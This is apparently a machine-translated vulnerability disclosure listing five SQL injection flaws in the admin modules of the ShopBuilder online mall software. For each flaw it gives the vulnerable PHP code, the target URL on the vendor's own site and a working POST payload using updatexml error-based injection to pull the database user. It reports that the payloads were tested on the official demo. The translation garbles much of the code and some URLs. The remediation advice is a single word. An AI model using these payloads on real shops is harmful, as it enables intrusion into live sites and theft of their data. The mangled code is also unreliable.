ShopBuilder online mall post-type SQL Injection packaging (1 ~ 5) The demo test on the official website is successful.

ShopBuilder online mall post-type SQL Injection packaging (1 ~ 5) The demo test on the official website is successful.

 

No global filtering for post

Just inject it directly ~



#1

 

module/activity/admin/activity_product_list.

If (! Empty ($ _ POST ['chk']) {@ $ id = implode (",", $ _ POST ['chk']); // batch delete if ($ _ POST ['submit '] = $ lang ['del'] and $ id) {$ SQL = "delete from ". ACTIVITYPRODUCT. "where product_id in ($ id)"; $ db-> query ($ SQL); $ SQL = "update ". PRO. "set promotion_id = '0' where id in ($ id)"; $ db-> query ($ SQL );}

After chk is not filtered and split, the value is assigned to the id that is brought into the database.

Post Data chk [] = 1) and 1 = updatexml (1, concat (0x5c, (select user (), 1) % 23

Official Website Test
 

(The following code is not included in the picture)



#2

Module/activity/admin/activity

51 rows

if($_POST['act']=='op')

{if(is_array($_POST['chk'])){$id=implode(",",$_POST['chk']);$sql="delete from ".ACTIVITY." where id in ($id)";$db->query($sql);$sql="delete from ".ACTIVITYPRODUCT." where activity_id in ($id)";$db->query($sql);foreach($_POST['chk'] as $list){$db->query("update ".PRO." set promotion_id=0 where promotion_id='$list'");}}

Can be injected when act = op

Http://www.a5shop.cn /? M = activity/admin & s = activity

post : chk[]=1) and 1=updatexml(1,concat(0x5c,(select user())),1)%23&act=op

#3

module/payment/admin/bank_account_mod

If (isset ($ _ POST ["action"]) {if (isset ($ _ POST ["result"]) {$ add_time = time (); if ($ _ POST ["result"] = 1) {$ SQL = "update ". ACCOUNTS. "set active = 1, check_time = '$ add_time', censor = '$ _ SESSION [ADMIN_USER]' where id = $ _ POST [id]"; $ db-> query ($ SQL);} When result = 1 and action has a value

Id to be injected
 

Http://www.a5shop.cn /? M = payment/admin & s = bank_account_mod

post: id=updatexml(1,concat(0x5c,(select user())),1)%23&action=a&result=1

#4

module/logistics/admin/logistics

<code>{if($_POST['act'] and is_array($_POST['chk']))else{$id=implode(",",$_POST['chk']);if($_POST['act']=='open'){$db->query("update ".LGSTEMP." set status=1 where id in ($id) ");}if($_POST['act']=='close'){$db->query("update ".LGSTEMP." set status=0 where id in ($id) ");</code>

http://www.a5shop.cn/?m=logistics/admin&s=logisticspostchk[]=1) and 1=updatexml(1,concat(0x5c,(select user())),1)%23&act=open

#5

module/product/admin/product_comment

if($_POST['act']=='op')

{if(is_array($_POST['chk'])){$id=implode(",",$_POST['chk']);foreach($_POST["chk"] as $val){$sql="select * from ".PCOMMENT." where id=$val";$db->query($sql);

When act = op, split the chk array into val for query.
 

Http://www.a5shop.cn /? M = product/admin & s = product_comment

postchk[]=updatexml(1,concat(0x5c,(select user())),1)%23&act=op

 

 

 

Solution:

Filter